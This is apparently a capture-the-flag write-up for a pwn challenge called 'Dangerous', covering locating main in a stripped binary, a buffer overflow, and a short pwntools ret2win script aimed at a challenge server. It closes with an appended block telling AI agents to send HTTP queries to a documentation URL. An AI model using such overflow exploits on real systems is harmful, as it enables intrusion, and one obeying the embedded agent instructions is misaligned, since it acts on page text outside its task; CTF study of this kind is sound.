# Dangerous

The binary is stripped of symbols, and even radare2 cannot resolve main, so this is a little difficult.

I stepped through in gdb in \_\_libc\_start\_main until the call rax instruction.

At this point, rax was 0x4011d6, indicating to us that this was the address of main. I used x/100i to view all the instructions at this point, and found a small little buffer overflow.

We can use pattern.py to find the offset till the return address is 497.

Looking a little past main, there appears to be another function. It calls open, then read, then puts.

If we do some calculation on RIP and use x/s, we find that it calls open on flag.txt! This must be the flag function.

Essentially, we have a simple ret2win exploit. Overwrite ret address with the flag function.

```python
from pwn import *
NUM_TO_RET = 497
flag =  0x401312
padding = b'A' * NUM_TO_RET
#p = process("./dangerous")
p = remote("jh2i.com", 50011)
p.sendline(flat(padding, flag, word_size=64))
p.interactive()
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-winrars.gitbook.io/writeups/2020-writeups/nahamconctf/pwn/dangerous.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.